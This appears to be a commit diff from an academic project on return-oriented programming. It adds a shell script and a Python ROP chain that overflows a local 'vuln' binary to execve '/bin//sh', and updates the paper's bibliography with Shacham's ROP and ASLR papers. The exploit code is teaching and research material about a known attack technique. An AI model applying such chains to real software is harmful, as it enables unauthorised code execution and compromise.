changes

inject.sh

@@ -0,0 +1,2 @@
+python3.10 payload.py
+./vuln "`cat payload`"

paper.bbl

@@ -1,4 +1,5 @@
-\begin{thebibliography}{RBSS12}
+\newcommand{\etalchar}[1]{$^{#1}$}
+\begin{thebibliography}{SPP{\etalchar{+}}04}
 
 \bibitem[ES]{el-sherei}
 Saif El-Sherei.
@@ -30,4 +31,20 @@ Ryan Roemer, Erik Buchanan, Hovav Shacham, and Stefan Savage.
 X86 instruction set reference - return from procedure.
 \newblock \url{https://c9x.me/x86/html/file_module_x86_id_280.html}.
 
+\bibitem[Sha07]{ropfirstpaper}
+Hovav Shacham.
+\newblock The geometry of innocent flesh on the bone: Return-into-libc without
+  function calls (on the x86).
+\newblock In {\em Proceedings of the 14th ACM Conference on Computer and
+  Communications Security}, CCS '07, page 552–561, New York, NY, USA, 2007.
+  Association for Computing Machinery.
+
+\bibitem[SPP{\etalchar{+}}04]{aslr}
+Hovav Shacham, Matthew Page, Ben Pfaff, Eu-Jin Goh, Nagendra Modadugu, and Dan
+  Boneh.
+\newblock On the effectiveness of address-space randomization.
+\newblock In {\em Proceedings of the 11th ACM Conference on Computer and
+  Communications Security}, CCS '04, page 298–307, New York, NY, USA, 2004.
+  Association for Computing Machinery.
+
 \end{thebibliography}

paper.blg

@@ -5,45 +5,45 @@ The style file: alpha.bst
 Database file #1: refs.bib
 Warning--to sort, need author or key in retx86
 Warning--to sort, need author or key in proggen-rop
-You've used 6 entries,
+You've used 8 entries,
             2543 wiz_defined-function locations,
-            590 strings with 5465 characters,
-and the built_in function-call counts, 1641 in all, are:
-= -- 155
-> -- 57
-< -- 3
-+ -- 18
-- -- 18
-* -- 91
-:= -- 255
-add.period$ -- 15
-call.type$ -- 6
-change.case$ -- 30
-chr.to.int$ -- 6
-cite$ -- 10
-duplicate$ -- 66
-empty$ -- 151
-format.name$ -- 24
-if$ -- 346
+            604 strings with 5940 characters,
+and the built_in function-call counts, 2855 in all, are:
+= -- 291
+> -- 105
+< -- 6
++ -- 36
+- -- 35
+* -- 156
+:= -- 418
+add.period$ -- 23
+call.type$ -- 8
+change.case$ -- 45
+chr.to.int$ -- 8
+cite$ -- 12
+duplicate$ -- 139
+empty$ -- 229
+format.name$ -- 43
+if$ -- 633
 int.to.chr$ -- 1
 int.to.str$ -- 0
-missing$ -- 1
-newline$ -- 30
-num.names$ -- 12
-pop$ -- 56
+missing$ -- 3
+newline$ -- 41
+num.names$ -- 18
+pop$ -- 72
 preamble$ -- 1
-purify$ -- 37
+purify$ -- 54
 quote$ -- 0
-skip$ -- 65
+skip$ -- 139
 stack$ -- 0
-substring$ -- 44
-swap$ -- 6
-text.length$ -- 3
-text.prefix$ -- 2
+substring$ -- 95
+swap$ -- 46
+text.length$ -- 6
+text.prefix$ -- 3
 top$ -- 0
-type$ -- 48
+type$ -- 64
 warning$ -- 2
-while$ -- 9
-width$ -- 8
-write$ -- 65
+while$ -- 16
+width$ -- 9
+write$ -- 98
 (There were 2 warnings)

payload.py

@@ -13,32 +13,42 @@
 
 p = bytes('AAAA' * 4 + 'BBBB' * 1, 'ascii') # Padding + EBP
 
-p += pack('<I', pop_edx) # write address of .data into edx
+# write /bin at .data
+p += pack('<I', pop_edx)
 p += pack('<I', data)
 p += pack('<I', filler)
-p += pack('<I', pop_eax) # write /bin into eax
+p += pack('<I', pop_eax)
 p += bytes('/bin', 'ascii')
-p += pack('<I', mov_edx_eax) # mov /bin to .data
-p += pack('<I', pop_edx) # address of .data + 4 into edx
+p += pack('<I', mov_edx_eax)
+# write //sh at .data + 4
+p += pack('<I', pop_edx)
 p += pack('<I', data + 4)
 p += pack('<I', filler)
-p += pack('<I', pop_eax) # //sh into eax
+p += pack('<I', pop_eax)
 p += bytes('//sh', 'ascii')
-p += pack('<I', mov_edx_eax) # mov //sh to .data + 4
-p += pack('<I', pop_edx) # address of .data + 8 into edx
+p += pack('<I', mov_edx_eax)
+# \0 at .data + 8
+p += pack('<I', pop_edx)
 p += pack('<I', data + 8)
 p += pack('<I', filler)
-p += pack('<I', xor_eax_eax) # clear eax
-p += pack('<I', mov_edx_eax) # write null after /bin/sh
-p += pack('<I', pop_ebx) # write address of string that points to program into ebx
+p += pack('<I', xor_eax_eax)
+p += pack('<I', mov_edx_eax)
+# write address of string that points to program into ebx
+p += pack('<I', pop_ebx)
 p += pack('<I', data)
-p += pack('<I', pop_ecx) # write arguments into ecx
+# write arguments into ecx
+p += pack('<I', pop_ecx)
 p += pack('<I', data + 8)
-p += pack('<I', xor_edx_edx) # clear edx
-p += pack('<I', xor_eax_eax) # set eax to 11 (execve)
+# write environment into edx
+p += pack('<I', xor_edx_edx)
+# set eax to 11
+p += pack('<I', xor_eax_eax)
 for _ in range(11):
     p += pack('<I', inc_eax)
-p += pack('<I', int_80) # call interrupt
+# call interrupt
+p += pack('<I', int_80)
+
 print(str(p)[2:-1])
+
 with open('payload', 'wb') as file:
     file.write(p)

refs.bib

@@ -3,7 +3,7 @@ @misc{el-sherei
 @misc{proggen-rop, title={Return-oriented Programming (ROP)}, howpublished="\url{https://www.proggen.org/doku.php?id=security%3Amemory-corruption%3Aexploitation%3Arop}", journal={Return-oriented Programming (ROP) - Raum für Ideen}}
 @misc{rny, howpublished="\url{https://renenyffenegger.ch/notes/Linux/fhs/proc/sys/kernel/randomize_va_space}", journal={/proc/sys/kernel/randomize_va_space}, author={Nyffenegger, Rene}}
 @misc{retx86, title={X86 instruction set reference - Return from Procedure}, howpublished="\url{https://c9x.me/x86/html/file_module_x86_id_280.html}", journal={War on Theism: x86 Instruction Set Reference}} 
-@inproceedings{hshacham,
+@inproceedings{ropfirstpaper,
 author = {Shacham, Hovav},
 title = {The Geometry of Innocent Flesh on the Bone: Return-into-Libc without Function Calls (on the X86)},
 year = {2007},
@@ -20,6 +20,23 @@ @inproceedings{hshacham
 location = {Alexandria, Virginia, USA},
 series = {CCS '07}
 }
+@inproceedings{aslr,
+author = {Shacham, Hovav and Page, Matthew and Pfaff, Ben and Goh, Eu-Jin and Modadugu, Nagendra and Boneh, Dan},
+title = {On the Effectiveness of Address-Space Randomization},
+year = {2004},
+isbn = {1581139616},
+publisher = {Association for Computing Machinery},
+address = {New York, NY, USA},
+url = {https://doi.org/10.1145/1030083.1030124},
+doi = {10.1145/1030083.1030124},
+abstract = {Address-space randomization is a technique used to fortify systems against buffer overflow attacks. The idea is to introduce artificial diversity by randomizing the memory location of certain system components. This mechanism is available for both Linux (via PaX ASLR) and OpenBSD. We study the effectiveness of address-space randomization and find that its utility on 32-bit architectures is limited by the number of bits available for address randomization. In particular, we demonstrate a <i>derandomization attack</i> that will convert any standard buffer-overflow exploit into an exploit that works against systems protected by address-space randomization. The resulting exploit is as effective as the original exploit, although it takes a little longer to compromise a target machine: on average 216 seconds to compromise Apache running on a Linux PaX ASLR system. The attack does not require running code on the stack.We also explore various ways of strengthening address-space randomization and point out weaknesses in each. Surprisingly, increasing the frequency of re-randomizations adds at most 1 bit of security. Furthermore, compile-time randomization appears to be more effective than runtime randomization. We conclude that, on 32-bit architectures, the only benefit of PaX-like address-space randomization is a small slowdown in worm propagation speed. The cost of randomization is extra complexity in system support.},
+booktitle = {Proceedings of the 11th ACM Conference on Computer and Communications Security},
+pages = {298–307},
+numpages = {10},
+keywords = {automated attacks, address-space randomization, diversity},
+location = {Washington DC, USA},
+series = {CCS '04}
+}
 @inproceedings{roperh,
 author = {Buchanan, Erik and Roemer, Ryan and Shacham, Hovav and Savage, Stefan},
 title = {When Good Instructions Go Bad: Generalizing Return-Oriented Programming to RISC},